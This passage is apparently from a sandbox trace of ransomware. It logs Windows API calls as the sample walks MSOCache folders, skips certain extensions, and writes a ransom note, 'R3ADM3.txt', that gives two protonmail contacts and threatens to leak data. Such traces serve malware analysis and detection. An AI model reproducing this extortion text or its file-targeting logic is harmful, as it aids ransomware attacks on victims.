nFileSizeLow=0x2fac00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0146.985] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2=".") returned 1 [0146.985] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="..") returned 1 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".UAKXC") returned 0x0 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".exe") returned 0x0 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".dll") returned 0x0 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".lnk") returned 0x0 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".sys") returned 0x0 [0146.985] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".msi") returned=".msi" [0146.985] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0146.986] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2=".") returned 1 [0146.986] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="..") returned 1 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".UAKXC") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".exe") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".dll") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".lnk") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".sys") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".msi") returned 0x0 [0146.986] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d08 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0146.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0146.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0146.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d08 | out: hHeap=0xea0000) returned 1 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d08 [0146.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6148 [0146.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0146.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0146.986] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5c83f350, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5c83f350, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ca083d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0146.986] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0146.986] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0146.986] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0146.987] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0146.987] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0146.987] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0146.987] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0146.987] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b78 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b78 | out: hHeap=0xea0000) returned 1 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b78 [0146.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef61f0 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0146.987] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0146.987] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeada8 | out: hHeap=0xea0000) returned 1 [0146.987] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0146.988] Sleep (dwMilliseconds=0x32) [0147.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0147.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0147.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeada8 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0147.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0147.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0147.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0147.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeada8 | out: hHeap=0xea0000) returned 1 [0147.047] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.682] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0147.682] WriteFile (in: hFile=0x6f0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0147.683] CloseHandle (hObject=0x6f0) returned 1 [0147.683] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.683] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.683] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5d094050, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d094050, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0147.683] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0147.683] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5d094050, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d094050, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0147.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0147.684] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5caa0950, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5caa0950, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d094050, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0147.684] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0147.684] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0147.684] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0147.684] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0147.684] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0147.684] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0147.684] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0147.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2da8 [0147.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0147.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0147.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2da8 | out: hHeap=0xea0000) returned 1 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2da8 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6298 [0147.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.685] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0147.685] lstrcmpW (lpString1="VisioLR.cab", lpString2=".") returned 1 [0147.685] lstrcmpW (lpString1="VisioLR.cab", lpString2="..") returned 1 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".UAKXC") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".exe") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".dll") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".lnk") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".sys") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".msi") returned 0x0 [0147.685] StrStrIW (lpFirst="VisioLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ec0 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0147.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0147.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ec0 | out: hHeap=0xea0000) returned 1 [0147.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ec0 [0147.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6340 [0147.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.686] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0147.686] lstrcmpW (lpString1="VisioMUI.msi", lpString2=".") returned 1 [0147.686] lstrcmpW (lpString1="VisioMUI.msi", lpString2="..") returned 1 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".UAKXC") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".exe") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".dll") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".lnk") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".sys") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".msi") returned=".msi" [0147.686] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0147.686] lstrcmpW (lpString1="VisioMUI.xml", lpString2=".") returned 1 [0147.686] lstrcmpW (lpString1="VisioMUI.xml", lpString2="..") returned 1 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".UAKXC") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".exe") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".dll") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".lnk") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".sys") returned 0x0 [0147.686] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".msi") returned 0x0 [0147.687] StrStrIW (lpFirst="VisioMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2df8 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2df8 | out: hHeap=0xea0000) returned 1 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2df8 [0147.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef63e8 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.687] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeadd0 | out: hHeap=0xea0000) returned 1 [0147.687] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0147.687] Sleep (dwMilliseconds=0x32) [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0147.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0147.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0147.964] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0147.964] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0147.966] CloseHandle (hObject=0x6dc) returned 1 [0147.989] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.990] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.990] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d341910, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d341910, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 